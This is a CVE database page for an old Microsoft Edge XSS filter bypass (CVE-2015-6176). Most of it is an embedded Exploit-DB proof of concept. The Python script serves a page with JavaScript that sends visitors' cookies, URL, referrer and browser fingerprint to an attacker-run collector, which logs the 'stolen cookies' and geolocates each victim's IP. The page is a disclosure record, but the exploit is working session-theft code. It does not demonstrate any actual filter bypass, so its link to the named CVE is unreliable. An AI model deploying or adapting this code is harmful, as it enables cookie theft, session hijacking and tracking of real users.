CVE-2015-6176 : Detail

Cross-site Scripting
A03-Injection
3.62%V4
Network
2015-12-09 10h00 +00:00
2018-10-12 17h57 +00:00
CVE Descriptions

Microsoft Edge mishandles HTML attributes in HTTP responses, which allows remote attackers to bypass a cross-site scripting (XSS) protection mechanism via unspecified vectors, aka "Microsoft Edge XSS Filter Bypass Vulnerability."

CVE Information

Related Weaknesses

| CWE-ID | Weakness Name | Source |
|---|---|---|
| CWE-79 | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') | |
The product does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users.

Metrics

| Metrics | Score | Severity | CVSS Vector | Source |
|---|---|---|---|---|
| V2 | 4.3 | | AV:N/AC:M/Au:N/C:N/I:P/A:N | nvd@nist.gov |

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile ranks CVEs according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVEs. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVEs.

Exploit information

Exploit Database EDB-ID : 52372

Publication date : 2025-07-21 22h00 +00:00
Author : nu11secur1ty
EDB Verified : No

# Titles: Microsoft Edge Windows 10 Version 1511 - Cross Site Scripting (XSS)
# Author: nu11secur1ty
# Date: 2025-07-18
# Vendor: Microsoft
# Software: Microsoft Edge Browser
# Reference: https://www.cve.org/CVERecord?id=CVE-2015-6176

```python
#!/usr/bin/python
# nu11secur1ty CVE-2015-6176
import http.server
import socketserver
import socket
import threading
from urllib import parse
import requests
import datetime

PORT = 8080
COLLECTOR_PORT = 9000

# HTML page with extended XSS exploit that sends lots of info via Image GET to collector
HTML_CONTENT = b"""<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8" />
<title>XSS Edge Bypass PoC</title>
<script>
window.onload = function() {
    try {
        var attackerServer = "http://{LOCAL_IP}:{COLLECTOR_PORT}/collect";
        var cookies = document.cookie || "";
        var url = window.location.href;
        var referrer = document.referrer;
        var language = navigator.language || "";
        var platform = navigator.platform || "";
        var timezone = Intl.DateTimeFormat().resolvedOptions().timeZone || "";
        var screenRes = screen.width + "x" + screen.height;
        var data = {
            cookie: cookies,
            url: url,
            referrer: referrer,
            language: language,
            platform: platform,
            timezone: timezone,
            screen: screenRes
        };
        var query = Object.keys(data).map(function(k) {
            return encodeURIComponent(k) + "=" + encodeURIComponent(data[k]);
        }).join("&");
        var img = new Image();
        img.src = attackerServer + "?" + query;
    } catch(e) {
        console.error("Error sending data:", e);
    }
};
</script>
</head>
<body>
<h1 style="color:red;">XSS Edge Bypass PoC</h1>
<p>If this alert appears, XSS is executed.</p>
</body>
</html>
"""

# Collector page with large sea picture and centered message (Unicode allowed)
COLLECTOR_PAGE = """<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8" />
<title>Collected</title>
<style>
body {
    margin: 0;
    background: url('https://images.unsplash.com/photo-1506744038136-46273834b3fb?auto=format&fit=crop&w=1350&q=80') no-repeat center center fixed;
    background-size: cover;
    height: 100vh;
    display: flex;
    justify-content: center;
    align-items: center;
    color: white;
    font-family: Arial, sans-serif;
    font-size: 2em;
    text-shadow: 2px 2px 5px rgba(0,0,0,0.7);
}
</style>
</head>
<body>
<div>Thank you for visiting the collector page </div>
</body>
</html>
"""


class ExploitHandler(http.server.SimpleHTTPRequestHandler):
    def do_GET(self):
        if self.path in ('/', '/index.html'):
            content = HTML_CONTENT.replace(b"{LOCAL_IP}", local_ip.encode()).replace(b"{COLLECTOR_PORT}", str(COLLECTOR_PORT).encode())
            self.send_response(200)
            self.send_header("Content-Type", "text/html; charset=utf-8")
            self.send_header("Content-Length", str(len(content)))
            self.end_headers()
            self.wfile.write(content)
        else:
            self.send_error(404)


class CollectorHandler(http.server.BaseHTTPRequestHandler):
    def do_GET(self):
        parsed_path = parse.urlparse(self.path)
        if parsed_path.path == "/collect":
            query = parse.parse_qs(parsed_path.query)
            cookie = query.get("cookie", [""])[0]
            url = query.get("url", [""])[0]
            referrer = query.get("referrer", [""])[0]
            language = query.get("language", [""])[0]
            platform = query.get("platform", [""])[0]
            timezone = query.get("timezone", [""])[0]
            screen = query.get("screen", [""])[0]
            ip = self.client_address[0]
            user_agent = self.headers.get("User-Agent", "Unknown")
            timestamp = datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S")
            location = self.get_location(ip)

            if cookie:
                print(f"[{timestamp}] [+] Collected cookie: {cookie}")
                print(f" URL: {url}")
                print(f" Referrer: {referrer}")
                print(f" Language: {language}")
                print(f" Platform: {platform}")
                print(f" Timezone: {timezone}")
                print(f" Screen Resolution: {screen}")
                print(f" From IP: {ip}")
                print(f" User-Agent: {user_agent}")
                print(f" Location: {location}")
                print("-" * 50)

                # Save collected info to a file
                with open("collected_data.log", "a", encoding="utf-8") as f:
                    f.write(f"[{timestamp}] Cookie: {cookie}\n")
                    f.write(f" URL: {url}\n")
                    f.write(f" Referrer: {referrer}\n")
                    f.write(f" Language: {language}\n")
                    f.write(f" Platform: {platform}\n")
                    f.write(f" Timezone: {timezone}\n")
                    f.write(f" Screen Resolution: {screen}\n")
                    f.write(f" IP: {ip}\n")
                    f.write(f" User-Agent: {user_agent}\n")
                    f.write(f" Location: {location}\n")
                    f.write("-" * 50 + "\n")

            self.send_response(200)
            self.send_header("Content-Type", "text/html; charset=utf-8")
            content = COLLECTOR_PAGE.encode('utf-8')
            self.send_header("Content-Length", str(len(content)))
            self.end_headers()
            self.wfile.write(content)
        else:
            self.send_error(404)

    def get_location(self, ip):
        # Use free IP info service; fallback gracefully if no internet
        try:
            resp = requests.get(f"https://ipinfo.io/{ip}/json", timeout=3)
            if resp.status_code == 200:
                data = resp.json()
                city = data.get("city", "")
                region = data.get("region", "")
                country = data.get("country", "")
                loc = data.get("loc", "")
                return f"{city}, {region}, {country} (coords: {loc})"
        except Exception:
            pass
        return "Location lookup failed or unavailable"


def get_local_ip():
    s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    try:
        s.connect(("8.8.8.8", 80))
        ip = s.getsockname()[0]
    except Exception:
        ip = "127.0.0.1"
    finally:
        s.close()
    return ip


def run_exploit_server():
    with socketserver.TCPServer(("", PORT), ExploitHandler) as httpd:
        print(f"[*] Exploit server running at: http://{local_ip}:{PORT}/index.html")
        httpd.serve_forever()


def run_collector_server():
    with socketserver.TCPServer(("", COLLECTOR_PORT), CollectorHandler) as httpd:
        print(f"[*] Collector server listening for stolen cookies at: http://{local_ip}:{COLLECTOR_PORT}/collect")
        httpd.serve_forever()


if __name__ == "__main__":
    local_ip = get_local_ip()
    try:
        print(f"[*] Your server IP is: {local_ip}")
        exploit_thread = threading.Thread(target=run_exploit_server, daemon=True)
        exploit_thread.start()
        run_collector_server()
    except KeyboardInterrupt:
        print("\n[!] Shutting down servers. Goodbye!")
```

# Video: [href](https://www.youtube.com/watch?v=T2YLrFsvXOc)
# Source: [href](https://github.com/nu11secur1ty/CVE-mitre/tree/main/2025/CVE-2015-6176)
# Buy me a coffee if you are not ashamed: [href](https://www.paypal.com/donate/?hosted_button_id=ZPQZT5XMC5RFY)

Products Mentioned

Configuration 0

Microsoft >> Edge >> Version -

References

http://www.securitytracker.com/id/1034316
Tags : vdb-entry, x_refsource_SECTRACK